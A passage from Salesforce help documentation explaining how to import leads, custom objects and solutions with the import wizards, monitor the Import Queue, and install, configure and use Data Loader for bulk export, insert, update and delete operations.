avoiding duplicates. For example, if you are matching by email and a record in your source file has the same email as
a record in Salesforce, then that record will be updated in Salesforce. If you are not matching by email and there is a
record in Salesforce with the same email, then a new record will be created. Select a matching type of “None” if you
do not want to de-duplicate leads; a new record will be created for every lead in your import file.

When importing new leads for a campaign, the Matching Type option is not available; the wizard does not merge
duplicate leads.

g. Organizations that use the Translation Workbench can specify the language of the import data.
h. If you use divisions, select a division to assign to all imported records. Alternatively, select “None” to use the record

owner’s default division on each record, or specify the division in your import file.
i. Select the checkbox to trigger workflow rules for new and updated records that match workflow rule criteria.
j. If your organization has multiple record types on leads, choose the active record type that will be applied to all leads in

your import file. However, if you are logged in as a user who has a default lead record type selected in your record type
preferences, then this drop-down list does not display and your default lead record type is automatically applied to the
imported records.

k. Click Next to continue.

3. Map the fields.

a. The wizard associates the Salesforce lead field names with the field names in your import file. You must verify the
default mappings and alter any incorrect mappings. Any unmapped fields are not imported.

b. If you chose to avoid duplicate leads (that is, the selected Matching Type is not “None”), check the Overwrite
existing lead values box if you want to overwrite existing lead fields with your import data. Note that you
cannot use this checkbox to update existing field data with blank values.

c. Click Next to continue.

4. Review and confirm.

Choose Import Now! to send your import request. Your leads are imported within the next 24 hours, and we notify you
via email when the import is complete. Once the system begins processing, you cannot cancel the import.

5. Check the Import Queue.
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You can use the Import Queue link to check the progress of your import. From Setup, click Monitoring > Imports.
Alternatively, click the Import Queue link on the Import Wizard for My Organization’s Leads page. For imports that
have not begun processing, you can click Del to cancel the import.

See Also:
Creating Export Files for Import Wizards
Field Mapping for Importing Leads
Importing Overview
Creating Export Files for Import Wizards
Field Mapping for Importing Leads
Accessing the Import Wizards

Import My Organization's Custom Objects

Custom object import available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To import custom objects:

With the Import My Organization's Custom Objects wizard, you can import custom objects.

Follow these steps to import custom objects. Click each link for more details.

1. Launch the wizard
2. Choose the custom object
3. Prevent duplicate records
4. Specify owner, master-detail, and lookup relationships
5. Set lookup record matching
6. Select record type
7. Upload your import file
8. Map fields
9. Confirm and submit your import
10. Complete your import

Note:  The import wizard is dynamic; it displays different screens depending on what you are importing and the setup
of your organization.

Launch the wizard

1. To import custom objects, from Setup, click Data Management > Import Custom Objects.
2. For best results, perform all of the steps provided on the introductory page.
3. Click Start the Import Wizard! to begin your import.
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Choose the custom object

1. The first step of the wizard lists the custom objects that have been defined for your organization.
2. Identify the custom object you are importing by selecting the corresponding radio button.
3. Click Next.

Prevent duplicate records

1. The import wizard can compare the records in your import file with existing records in Salesforce in order to prevent
duplicate records from being created as a result of your import. Indicate whether you would like to prevent duplicate records
from being created. You must select Yes in order to update existing records.

2. If you choose Yes, then additional choices will appear:

• Choose the field that you are using to match existing records in Salesforce with records in your import file. The
External ID option is disabled if no external ID fields have been created for your records.

• Choose what you want to happen if matches are found—only import new records, only update existing records, or
update existing records and import new ones.

Note:  If you have chosen to match by Salesforce ID, you can only update existing records; you cannot
import new ones.

3. Click Next.

Specify owner, master-detail, and lookup relationships

1. Custom objects can be owned by users, or they can have a master-detail relationship with other records. For example, a
custom object can have a custom field that creates a master-detail relationship with accounts. In that case, your import file
must include the names or IDs of all associated accounts.

• If your custom objects are owned by users, then choose the field in your import file to use for matching record owners.

When you choose “Name,” the following formats are valid:

◊ First name followed by last name
◊ Last name followed by first name
◊ Alias
◊ Username

• If your records have a master-detail relationship with another kind of record, then choose the field in your import file
to use for matching master records.

2. Records can have custom fields that create lookup relationships with other records. If you have included lookup fields in
your import file, then check the corresponding boxes.

Note:  Any related records must already exist in Salesforce before proceeding. Related records will not be updated
during your import even if your import file contains different values for fields on those related records.

3. Click Next.

Set lookup record matching

1. If you checked one or more lookup fields in the previous step, select the field (name or ID) you are using to uniquely
identify those related records.

2. Click Next.
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Select record type

1. If the records you are importing have record types, then choose the record type that you want to assign to the records in
your import file.

2. If you are inserting new records and updating existing records at the same time, then choose whether to override the record
types of existing records.

3. Click Next.

Upload your import file

1. Click Browse... to provide the location of your import file.
2. Choose the character encoding of your import file. In most cases, you can accept the default value.
3. Make additional settings depending on the setup of your organization, such as whether workflow rules will be triggered

and the language of the records in the import file.
4. Click Next.

Map fields

1. Map the fields in your import file to the appropriate Salesforce fields by matching the fields on the left, which includes all
the columns in your import file, with the appropriate Salesforce field on the right. If the column labels in your import file
exactly match field labels in Salesforce, the wizard automatically maps those fields for you. However, if two or more of
your file's column labels are identical matches with a field in Salesforce, you must map the fields manually.

Note:  Some Salesforce fields cannot be updated using import, for example, the Created Date and Last
Modified Date. So even though you may be using an exported report as your import file, some of the Salesforce
fields in your file cannot be mapped.

2. Click Next. The import wizard warns you if you have not mapped all of the fields in your import file. Unmapped field
values are not imported.

Confirm and submit your import

1. Read any warning messages that the import wizard displays. Optionally, click Previous to return to earlier steps and resolve
potential problems.

2. Click Import Now! to submit your import request to Salesforce.

Complete your import

1. A message indicates approximately how long the import will take. When the import operation is finished, a message from
Customer Support will be sent to the email address shown.

2. Click Finish to exit the wizard.
3. To monitor the status of your pending import, from Setup, click Monitoring > Imports.

See Also:
Accessing the Import Wizards
What Is Imported for Custom Objects?
Importing Overview
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Import My Organization's Solutions

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Import Solutions”To import solutions:

With the Import My Organization's Solutions wizard, you can import solutions.

Follow these steps to import solutions. Click each link for more details.

1. Launch the wizard
2. Choose the type of solution (multilingual solutions only)
3. Prevent duplicate records
4. Specify author and lookup relationships
5. Set lookup record matching
6. Select record type
7. Upload your import file
8. Map fields
9. Confirm and submit your import
10. Complete your import

Note:  The import wizard is dynamic; it displays different screens depending on what you are importing and the setup
of your organization.

Launch the wizard

1. To import solutions, from Setup, click Data Management > Import Solutions.
2. For best results, perform all of the steps provided on the introductory page.
3. Click Start the Import Wizard! to begin your import.

Choose the type of solution (multilingual solutions only)

1. If multilingual solutions is enabled for your organization, choose to import either master solutions or translated solutions.
You cannot import both at the same time.

For each translated solution you import, include the 15 to 18 character Solution ID field of its master solution in a
master solution ID column in your import file. This will help you avoid having to manually associate translated solutions
with master solutions after import. To view the Solution ID field for master solutions, run the Translated Solutions
report.

2. Select the language of the solutions you are importing from the Language drop-down list. For each import, you can only
select one language so make sure your import file includes solutions in a single language.
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Prevent duplicate records

1. The import wizard can compare the records in your import file with existing records in Salesforce in order to prevent
duplicate records from being created as a result of your import. Indicate whether you would like to prevent duplicate records
from being created. You must select Yes in order to update existing records.

2. If you choose Yes, then additional choices will appear:

• Choose the field that you are using to match existing records in Salesforce with records in your import file. The
External ID option is disabled if no external ID fields have been created for your records.

• Choose what you want to happen if matches are found—only import new records, only update existing records, or
update existing records and import new ones.

Note:  If you have chosen to match by Salesforce ID, you can only update existing records; you cannot
import new ones.

3. Click Next.

Specify author and lookup relationships

1. Solutions are associated with authors - the users who initially created the solutions. If you have included a column in your
import file to identify authors, specify the user field it contains.

When you choose “Name,” the following formats are valid:

• First name followed by last name
• Last name followed by first name
• Alias
• Username

Choose None to specify yourself as the author of the imported solutions.
2. Records can have custom fields that create lookup relationships with other records. If you have included lookup fields in

your import file, then check the corresponding boxes.

Note:  Any related records must already exist in Salesforce before proceeding. Related records will not be updated
during your import even if your import file contains different values for fields on those related records.

3. Click Next.

Set lookup record matching

1. If you checked one or more lookup fields in the previous step, select the field (name or ID) you are using to uniquely
identify those related records.

2. Click Next.

Select record type

1. If the records you are importing have record types, then choose the record type that you want to assign to the records in
your import file.

2. If you are inserting new records and updating existing records at the same time, then choose whether to override the record
types of existing records.

3. Click Next.

480

Accessing the Import WizardsImport Your Data



Upload your import file

1. Click Browse... to provide the location of your import file.
2. Choose the character encoding of your import file. In most cases, you can accept the default value.
3. Make additional settings depending on the setup of your organization, such as whether workflow rules will be triggered

and the language of the records in the import file.
4. Click Next.

Map fields

1. Map the fields in your import file to the appropriate Salesforce fields by matching the fields on the left, which includes all
the columns in your import file, with the appropriate Salesforce field on the right. If the column labels in your import file
exactly match field labels in Salesforce, the wizard automatically maps those fields for you. However, if two or more of
your file's column labels are identical matches with a field in Salesforce, you must map the fields manually.

Note:  Some Salesforce fields cannot be updated using import, for example, the Created Date and Last
Modified Date. So even though you may be using an exported report as your import file, some of the Salesforce
fields in your file cannot be mapped.

2. Click Next. The import wizard warns you if you have not mapped all of the fields in your import file. Unmapped field
values are not imported.

Confirm and submit your import

1. Read any warning messages that the import wizard displays. Optionally, click Previous to return to earlier steps and resolve
potential problems.

2. Click Import Now! to submit your import request to Salesforce.

Complete your import

1. A message indicates approximately how long the import will take. When the import operation is finished, a message from
Customer Support will be sent to the email address shown.

2. Click Finish to exit the wizard.
3. To monitor the status of your pending import, from Setup, click Monitoring > Imports.

See Also:
Importing Overview
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Data Import Wizard — Pilot

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Enable Import Wizard Pilot”To use the Data Import Wizard:

“Import Personal Contacts”To import accounts and contacts:

“Import Leads”To import leads:

“Import Solutions”To import solutions:

“Modify All Data”To import custom objects:

The Data Import Wizard is currently available through a pilot program. It is automatically enabled for all Developer Edition
organizations. To enable the wizard for Enterprise and Unlimited Edition organizations, contact salesforce.com.

The Data Import Wizard provides a unified interface that lets you import a number of standard Salesforce objects, including
accounts, contacts, leads, and solutions. The wizard also lets you import custom objects.

You can import up to 50,000 records at a time.

The Data Import Wizard is supported in the latest versions of Chrome, Safari, Firefox, and Internet Explorer. The wizard is
not supported in Internet Explorer 9.

Note:

• Salesforce.com recommends you import a small test file first to make sure that you have prepared your source data
correctly.

• The separate import wizards for accounts, contacts, leads, solutions, and custom objects are still available during
the pilot. Their functionality hasn’t changed. To see a list of differences between the old and new wizards, review
the import wizards comparison table.

1. Prepare your data for import and create an import file.

Avoid errors, duplication of data, and frustration by preparing your data for import before you launch the wizard. See the
FAQ item “How do I prepare my data for import?” on the Data Import Wizard welcome page for more information on
preparing your data.

2. Start the wizard.

a. From Setup, click Data Management > Data Import Wizard.
b. Review the information provided on the welcome page, then click Launch Wizard!

3. Choose the data that you want to import.

a. Click Standard Objects to import accounts, contacts, leads, or solutions. Click Custom Objects to import custom
objects.

b. Specify whether you want to add new records to Salesforce, update existing records, or add and update records
simultaneously.
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c. Select Trigger workflow rules for new and updated records to trigger workflow rules for new and
updated records that match existing workflow rule criteria.

d. Specify the file that contains your data.

You can specify your data file by dragging the CSV to the upload area of the page or by clicking the CSV category
you’re using and then navigating to and selecting the file.

e. Choose a character encoding method for your file. Most users will not need to change their character encoding.
f. Click Next.

4. Map your data fields to Salesforce data fields.

The Data Import Wizard tries to map as many of your data fields as possible to standard Salesforce data fields. If Salesforce
can’t automatically map fields, however, you’ll need to do it manually. Unmapped fields are not imported into Salesforce.

To see a list of standard Salesforce data fields, from Setup click Customize, click the object whose fields you’re interested
in, and click Fields. For example, if you want to see a list of standard Salesforce fields for leads, click Customize > Leads
> Fields.

a. Scan the list of mapped data fields and locate any unmapped fields.

You can also choose Unmapped Fields from the Show drop-down list to view only unmapped fields.

b. Click Map to the left of each unmapped field.
c. In the Map to a Salesforce Field dialog box, choose the Salesforce field(s) you want to map to and click Save.
d. To change mappings that Salesforce performed automatically, click Change to the left of the appropriate field, then

choose the Salesforce field(s) you want to map to and click Save.
e. To exclude a field from being imported, click Map or Change next to the left of the field, select Do not import

this field, and click Save.
f. Click Save Mapping to save the mapping for use later.
g. Click Next.

5. Review and start your import.

a. Review your import information on the Review page. If you still have unmapped fields that you want to import, click
Previous to return to the previous page and specify your mappings.

b. Click Start Import.

6. Check import status.

From Setup, click Jobs > Bulk Data Load Jobs.

Note:  Only Administrators have access to the Bulk Data Load Jobs page in Salesforce Setup.
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Using the Import Queue
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To use the Import Queue:

Administrators can check the Import Queue to view details about an import or to cancel an organization import. Import details
are removed from the queue three days after completion.

1. From Setup, click Monitoring > Imports.
2. Select the file name of the import file to see the Import Queue Detail page for that file.

If you want to cancel an import, and the import has not started processing, click Del. You cannot cancel an import after it has
started processing.

The possible values of the Status column are listed below:

DescriptionStatus

The import did not complete successfully. The error details are emailed to the user who performed the
import. Aborted imports can be retried within three days, but, if multiple retry attempts are made, the
import cannot remain in the queue for more than 30 days from the original import attempt.

Aborted

The import completed successfully without errors.Completed

The import was processed and errors were encountered. The error details are emailed to the user who
performed the import. The user can fix the errors, and then attempt the import again.

Error

The import is in the queue but has not started processing yet.Pending

The import is in the queue and is currently being processed.Processing

See Also:
Importing Overview
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Undoing an Import
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To mass delete data:

If you import accounts, contacts, leads, or solutions by mistake, your administrator can from Setup, click Data Management
> Mass Delete Records to delete the items you mistakenly imported. View the Using Mass Delete to Undo Imports document
for instructions.

The Mass Delete Records tools do not support custom objects. If you import custom objects by mistake in Enterprise,
Unlimited, or Developer Edition, your administrator can use the Data Loader to mass delete the mistakenly imported records.
See Performing Mass Deletes on page 499.

See Also:
Importing Overview

DATA LOADER

Data Loader Overview
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Data Loader is a client application for the bulk import or export of data. Use it to insert, update, delete, or export Salesforce
records.

When importing data, Data Loader reads, extracts, and loads data from comma separated values (CSV) files or from a database
connection. When exporting data, it outputs CSV files.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

You can use Data Loader in two different ways:

• User interface—When you use the user interface, you work interactively to specify the configuration parameters, CSV files
used for import and export, and the field mappings that map the field names in your import file with the field names in
Salesforce.
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• Command line—When you use the command line, you specify the configuration, data sources, mappings, and actions in
files. This enables you to set up Data Loader for automated processing.

Data Loader offers the following key features:

• An easy-to-use wizard interface for interactive use

• An alternate command line interface for automated batch operations

• Support for large files with up to 5 million records

• Drag-and-drop field mapping

• Support for all objects, including custom objects

• Can be used to process data in both Salesforce and Database.com

• Detailed success and error log files in CSV format

• A built-in CSV file viewer

• Support for Windows 7

To get started, see the following topics:

• When to Use Data Loader

• Installing Data Loader

Note:  In previous versions, Data Loader has been known as “AppExchange Data Loader“ and “Sforce Data Loader.”

When to Use Data Loader
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Data Loader complements the web-based import wizards that are accessible from the Setup menu in the online application.
Refer to the following guidelines to determine which method best suits your business needs:

Use Data Loader when:

• You need to load 50,000 to 5,000,000 records. Data Loader is supported for loads of up to 5 million records. If you need
to load more than 5 million records, we recommend you work with a salesforce.com partner or visit the App Exchange for
a suitable partner product.

• You need to load into an object that is not yet supported by the import wizards.
• You want to schedule regular data loads, such as nightly imports.
• You want to export your data for backup purposes.

Use the import wizards when:

• You are loading less than 50,000 records.
• The object you need to import is supported by import wizards. To see what import wizards are available and thus what

objects they support, from Setup, click Data Management.
• You want to prevent duplicates by uploading records according to account name and site, contact email address, or lead

email address.

For more information about the import wizards, see Importing Overview on page 434.
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INSTALL AND CONFIGURE DATA LOADER

Installing Data Loader
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Modify All Data”To access the page to download Data Loader:

The appropriate user permission for the operation you are
doing, for example, “Create” on accounts to insert new
accounts

To use Data Loader:

System Requirements

To use Data Loader, you need:

• Microsoft® Windows® 7 or Windows XP
• 120 MB free disk space
• 256 MB available memory
• Java JRE 1.6 or later (Windows 7 or Windows XP)
• Sun JVM 1.6 or later (Windows 7 or Windows XP)
• Administrator privileges on the machine

Installation Procedure

Warning:  Over time, multiple versions of the Data Loader client application have been available for download.
Different versions have different entries in the Add or Remove Programs dialog in your Windows Control Panel.
Some versions were released with earlier product names such as “AppExchange Data Loader” or “Sforce Data Loader.”
You can run different versions at the same time on one computer. However, do not install multiple copies of the same
version.

The latest version is always available in Salesforce. If you have previously installed the latest version and want to install
it again, first remove it from your computer by using the Add or Remove Programs dialog in Windows Control Panel.

1. In the application, from Setup, click Data Management > Data Loader.
2. Click Download the Data Loader and save the installer to your PC. If you're prompted to run or save the file, click Run.

If you're then prompted to allow the program to make changes to the computer, click Yes.
3. Double-click the downloaded file to launch the InstallShield wizard.
4. Click Next.
5. Accept the license agreement and click Next.
6. Accept the default installation directory, or click Change... to choose another directory. Click Next.
7. Click Install.
8. Click Finish.
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9. To start Data Loader, double-click the Data Loader icon on your desktop, or choose Start > All Programs > salesforce.com
> Apex Data Loader > Apex Data Loader.

Tip:

If you experience login issues in the command line interface after upgrading to a new version of Data Loader, please
try re-encrypting your password to solve the problem. For information on the password encryption utility, see
Encrypting From the Command Line on page 503.

If you want to download the source code and make changes, an open source version of Data Loader is available at
https://github.com/forcedotcom/dataloader.

Login Considerations

If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated. Salesforce automatically
sends you an activation email that you can use to log in. The email contains a security token that you must add to the end of
your password. For example, if your password is mypassword, and your security token is XXXXXXXXXX, you must enter
mypasswordXXXXXXXXXX to log in.

Configuring Data Loader
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Use the Settings menu to change the default operation settings of Data Loader.

1. Start Data Loader by choosing Start > Programs > salesforce.com > Data Loader > Data Loader.
2. Choose Settings > Settings.
3. Edit the fields as desired:

DescriptionField

In a single insert, update, upsert, or delete operation, records
moving to or from Salesforce are processed in increments of

Batch size

this size. The maximum value is 200. We recommend a
value between 50 and 100.

The maximum value is 10,000 if the Use Bulk API option
is selected.

Select this option to insert blank mapped values as null
values during data operations. Note that when you are

Insert null values

updating records, this option instructs Data Loader to
overwrite any existing data in mapped fields.

This option is not available if the Use Bulk API option
is selected. Empty field values are ignored when you update
records using the Bulk API. To set a field value to null
when the Use Bulk API option is selected, use a field value
of #N/A.
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DescriptionField

Specify the ID of the assignment rule to use for inserts,
updates, and upserts. This option applies to inserts, updates,

Assignment rule

and upserts on cases and leads. It also applies to updates on
accounts if your organization has territory assignment rules
on accounts. The assignment rule overrides Owner values
in your CSV file.

Enter the URL of the Salesforce server with which you want
to communicate. For example, if you are loading data into

Server host

a sandbox, change the URL to
https://test.salesforce.com.

By default, Salesforce resets the URL after login to the one
specified in Server host. To turn off this automatic reset,
disable this option.

Reset URL on Login

Compression enhances the performance of Data Loader and
is turned on by default. You may want to disable compression

Compression

if you need to debug the underlying SOAP messages. To
turn off compression, enable this option.

Specify how many seconds Data Loader waits to receive a
response back from the server before returning an error for
the request.

Timeout

In a single export or query operation, records are returned
from Salesforce in increments of this size. The maximum

Query request size

value is 2,000 records. Larger values may improve
performance but use more memory on the client.

Select this option to generate success and error files when
exporting data.

Generate status files for exports

Select this option to force files to open in UTF-8 encoding,
even if they were saved in a different format.

Read all CSVs with UTF-8 encoding

Select this option to force files to be written in UTF-8
encoding.

Write all CSVs with UTF-8 encoding

Select this option to support the date formats dd/MM/yyyy
and dd/MM/yyyy HH:mm:ss.

Use European date format

Select this option to truncate data in the following types of
fields when loading that data into Salesforce: Email,

Allow field truncation

Multi-select Picklist, Phone, Picklist, Text, and Text
(Encrypted).

In Data Loader versions 14.0 and earlier, values for fields of
those types are truncated by Data Loader if they are too
large. In Data Loader version 15.0 and later, the load
operation fails if a value is specified that is too large.

489

Configuring Data LoaderImport Your Data



DescriptionField

Selecting this option allows you to specify that the previous
behavior, truncation, be used instead of the new behavior in
Data Loader versions 15.0 and later. This option is selected
by default and has no effect in versions 14.0 and earlier.

This option is not available if the Use Bulk API option
is selected. In that case, the load operation fails for the row
if a value is specified that is too large for the field.

Select this option to use the Bulk API to insert, update,
upsert, delete, and hard delete records. The Bulk API is

Use Bulk API

optimized to load or delete a large number of records
asynchronously. It’s faster than the default SOAP-based
API due to parallel processing and fewer network
round-trips.

Warning: When you select the Hard Delete
operation, the deleted records are not stored in the
Recycle Bin. Instead, they become immediately
eligible for deletion.

Select this option to use serial instead of parallel processing
for Bulk API. Processing in parallel can cause database

Enable serial mode for Bulk API

contention. When this is severe, the load may fail. Using
serial mode guarantees that batches are processed one at a
time. Note that using this option may significantly increase
the processing time for a load.

This option is only available if the Use Bulk API option
is selected.

Select this option to use Bulk API to upload zip files
containing binary attachments, such as Attachment records
or Salesforce CRM Content.

This option is only available if the Use Bulk API option
is selected.

Upload Bulk API Batch as Zip File

Select this option to specify a default time zone.

If a date value does not include a time zone, this value is
used.

Time Zone

• If no value is specified, the time zone of the computer
where Data Loader is installed is used.

• If an incorrect value is entered, GMT is used as the time
zone and this fact is noted in the Data Loader log.

Valid values are any time zone identifier which can be passed
to the Java getTimeZone(java.lang.String) method.
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DescriptionField

The value can be a full name such as
America/Los_Angeles, or a custom ID such as
GMT-8:00.

The host name of the proxy server, if applicable.Proxy host

The proxy server port.Proxy port

The username for proxy server authentication.Proxy username

The password for proxy server authentication.Proxy password

The name of the Windows domain used for NTLM
authentication.

Proxy NTLM domain

If your last operation failed, you can use this setting to begin
where the last successful operation finished.

Start at row

4. Click OK to save your settings.

See Also:
Data Loader Behavior with Bulk API Enabled
Configuring the Data Loader to Use the Bulk API

Data Loader Behavior with Bulk API Enabled

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Enabling the Bulk API in Data Loader allows you to load or delete a large number of records faster than using the default
SOAP-based API. However, there are some differences in behavior in Data Loader when you enable the Bulk API. One
important difference is that it allows you to execute a hard delete if you have the permission and license. See Configuring Data
Loader on page 488.

The following settings are not available on the Settings > Settings page in Data Loader when the Use Bulk API option is
selected:

Insert null values

This option enables Data Loader to insert blank mapped values as null values during data operations when the Bulk
API is disabled. Empty field values are ignored when you update records using the Bulk API. To set a field value to
null when the Use Bulk API option is selected, use a field value of #N/A.
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Allow field truncation

This option directs Data Loader to truncate data for certain field types when the Bulk API is disabled. A load operation
fails for the row if a value is specified that is too large for the field when the Use Bulk API option is selected.

See Also:
Configuring Data Loader

Configuring the Data Loader to Use the Bulk API

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The Bulk API is optimized to load or delete a large number of records asynchronously. It is faster than the SOAP-based API
due to parallel processing and fewer network round-trips. By default, Data Loader uses the SOAP-based API to process
records.

To configure Data Loader to use the Bulk API for inserting, updating, upserting, deleting, and hard deleting records:

1. Start Data Loader by choosing Start > Programs > salesforce.com > Data Loader > Data Loader.
2. Choose Settings > Settings.
3. Select the Use Bulk API option.
4. Click OK.

Note:

• You can also select the Enable serial mode for Bulk API option. Processing in parallel can cause database
contention. When this is severe, the load may fail. Using serial mode guarantees that batches are processed one
at a time. Note that using this option may significantly increase the processing time for a load.

• Caution: When you select the Hard Delete operation, the deleted records are not stored in the Recycle Bin.
Instead, they become immediately eligible for deletion.

See Also:
Configuring Data Loader

Uninstalling the Data Loader
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

To uninstall the Data Loader client application:

1. Go to Start > Control Panel > Add or Remove Programs.
2. Select the Data Loader program.
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3. Click Remove. The uninstaller removes the program from your computer.

USE DATA LOADER

Data Types Supported by Data Loader
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Data Loader supports the following data types:

Base64

String path to file (converts the file to a base64–encoded array). Base64 fields are only used to insert or update attachments
and Salesforce CRM Content. For more information, see Uploading Attachments on page 499 and Uploading Content
with the Data Loader on page 500.

Boolean

• True values (case insensitive) = yes, y, true, on, 1

• False values (case insensitive) = no, n, false, off, 0

Date Formats

We recommend you specify dates in the format yyyy-MM-ddTHH:mm:ss.SSS+/-HHmm:

• yyyy is the four-digit year

• MM is the two-digit month (01-12)

• dd is the two-digit day (01-31)

• HH is the two-digit hour (00-23)

• mm is the two-digit minute (00-59)

• ss is the two-digit seconds (00-59)

• SSS is the three-digit milliseconds (000-999)

• +/-HHmm is the Zulu (UTC) time zone offset

The following date formats are also supported:

• yyyy-MM-dd'T'HH:mm:ss.SSS'Z'

• yyyy-MM-dd'T'HH:mm:ss.SSS Pacific Standard Time

• yyyy-MM-dd'T'HH:mm:ss.SSSPacific Standard Time

• yyyy-MM-dd'T'HH:mm:ss.SSS PST

• yyyy-MM-dd'T'HH:mm:ss.SSSPST

• yyyy-MM-dd'T'HH:mm:ss.SSS GMT-08:00

• yyyy-MM-dd'T'HH:mm:ss.SSSGMT-08:00

• yyyy-MM-dd'T'HH:mm:ss.SSS -800

• yyyy-MM-dd'T'HH:mm:ss.SSS-800
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• yyyy-MM-dd'T'HH:mm:ss

• yyyy-MM-dd HH:mm:ss

• yyyyMMdd'T'HH:mm:ss

• yyyy-MM-dd

• MM/dd/yyyy HH:mm:ss

• MM/dd/yyyy

Note the following tips for date formats:

• To enable date formats that begin with the day rather than the month, select the Use European date format
box in the Settings dialog. European date formats are dd/MM/yyyy and dd/MM/yyyy HH:mm:ss.

• If your computer's locale is east of Greenwich Mean Time (GMT), we recommend that you change your computer
setting to GMT in order to avoid date adjustments when inserting or updating records.

• Only dates within a certain range are valid. The earliest valid date is 1700-01-01T00:00:00Z GMT, or just after
midnight on January 1, 1700. The latest valid date is 4000-12-31T00:00:00Z GMT, or just after midnight on
December 31, 4000. These values are offset by your time zone. For example, in the Pacific time zone, the earliest
valid date is 1699-12-31T16:00:00, or 4:00 PM on December 31, 1699.

Double

Standard double string

ID

A Salesforce ID is a case-sensitive 15-character or case–insensitive 18-character alphanumeric string that uniquely
identifies a particular record.

Tip: To ensure data quality, make sure that all Salesforce IDs you enter in Data Loader are in the correct case.

Integer

Standard integer string

String

All valid XML strings; invalid XML characters are removed.
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Exporting Data
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Read” on the recordsTo export records:

“Read” on the recordsTo export all records:

You can use the Data Loader export wizard to extract data from any Salesforce object. When you export, you can choose to
include (Export All) or exclude (Export) soft-deleted records.

1. Start the Data Loader by choosing Start > Programs > salesforce.com > Data Loader > Data Loader.
2. Click Export or Export All . These commands can also be found in the File menu.
3. Enter your Salesforce username and password. Click Log in to log in. After your login completes successfully, click Next.

(Until you log out or close the program, you will not be asked to log in again.)

If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated. Salesforce
automatically sends you an activation email that you can use to log in. The email contains a security token that you must
add to the end of your password. For example, if your password is mypassword, and your security token is XXXXXXXXXX,
you must enter mypasswordXXXXXXXXXX to log in.

4. Choose an object. For example, select the Account object. If your object name does not display in the default list, check
Show all objects to see a complete list of objects that you can access. The objects will be listed by localized label
name, with developer name noted in parentheses. For object descriptions, see the SOAP API Developer's Guide.

5. Click Browse... to select the CSV file to which the data will be exported. You can enter a new file name to create a new
file or choose an existing file.

If you select an existing file, the contents of that file are replaced. Click Yes to confirm this action, or click No to choose
another file.

6. Click Next.
7. Create a SOQL query for the data export. For example, check Id and Name in the query fields and click Finish. As you

follow the next steps, you will see that the CSV viewer displays all the Account names and their IDs. SOQL is the Salesforce
Object Query Language that allows you to construct simple but powerful query strings. Similar to the SELECT command
in SQL, SOQL allows you to specify the source object, a list of fields to retrieve, and conditions for selecting rows in the
source object.

a. Choose the fields you want to export.
b. Optionally, select conditions to filter your data set. If you do not select any conditions, all the data to which you have

read access will be returned.
c. Review the generated query and edit if necessary.

Tip:  You can use a SOQL relationship query to include fields from a related object. For example:

Select Name, Pricebook2Id, Pricebook2.Name, Product2Id, Product2.ProductCode FROM
PricebookEntry WHERE IsActive = true
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Or:

Select Id, LastName, Account.Name FROM Contact

When using relationship queries in Data Loader, the fully specified field names are case-sensitive. For example,
using ACCOUNT.NAME instead of Account.Name does not work.

Data Loader doesn’t support nested queries or querying child objects. For example, queries similar to the following
return an error:

SELECT Amount, Id, Name, (SELECT Quantity, ListPrice,
PriceBookEntry.UnitPrice, PricebookEntry.Name,
PricebookEntry.product2.Family FROM OpportunityLineItems)
FROM Opportunity

Also, Data Loader doesn’t support queries that make use of polymorphic relationships. For example, the following
query results in an error:

SELECT Id, Owner.Name, Owner.Type, Owner.Id, Subject FROM Case

For more information on SOQL, see the Force.com SOQL and SOSL Reference.

8. Click Finish, then click Yes to confirm.
9. A progress information window reports the status of the operation.
10. After the operation completes, a confirmation window summarizes your results. Click View Extraction to view the CSV

file, or click OK to close. For more details, see Reviewing Output Files on page 501.

Note:  Data Loader currently does not support the extraction of attachments. As a workaround, we recommend that
you use the weekly export feature in the online application to export attachments.

Defining Field Mappings
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Whenever you insert, delete, or update files, use the Mapping Dialog window to associate Salesforce fields with the columns
of your CSV file. For more information, see Inserting, Updating, or Deleting Data Using Data Loader on page 497.

1. To automatically match fields with columns, click Auto-Match Fields to Columns. The Data Loader automatically
populates the list at the bottom of the window, based on the similarity of field and column names. Note that for a delete
operation, automatic matching works only on the ID field.

2. To manually match fields with columns, click and drag fields from the list of Salesforce fields at the top to the list of CSV
column header names at the bottom. For example, if you are inserting new Account records where your CSV file contains
the names of new accounts, click and drag the Name field to the right of the NAME column header field.

3. Optionally, click Save Mapping to save this mapping for future use. Specify a name for the SDL mapping file.

If you select an existing file, the contents of that file are replaced. Click Yes to confirm this action, or click No to choose
another file.
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4. Click OK to use your mapping for the current operation.

Inserting, Updating, or Deleting Data Using Data Loader
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Create” on the recordTo insert records:

“Edit” on the recordTo update records:

“Create” or “Edit” on the recordTo upsert records:

“Delete” on the recordTo delete records:

“Delete” on the recordTo hard delete records

The insert, update, upsert, delete, and hard delete wizards in Data Loader allow you to add new records, modify existing
records, or delete existing records. Note that “upsert” is a combination of inserting and updating. If a record in your file matches
an existing record, the existing record is updated with the values in your file. If no match is found, then the record is created
as new. When you hard delete records, the deleted records are not stored in the Recycle Bin and become immediately eligible
for deletion. For more information, see Configuring Data Loader on page 488.

1. Start Data Loader by choosing Start > Programs > salesforce.com > Data Loader > Data Loader.
2. Click Insert, Update, Upsert, Delete or Hard Delete. These commands can also be found in the File menu.
3. Enter your Salesforce username and password. Click Log in to log in. After your login completes successfully, click Next.

(Until you log out or close the program, you are not asked to log in again.)

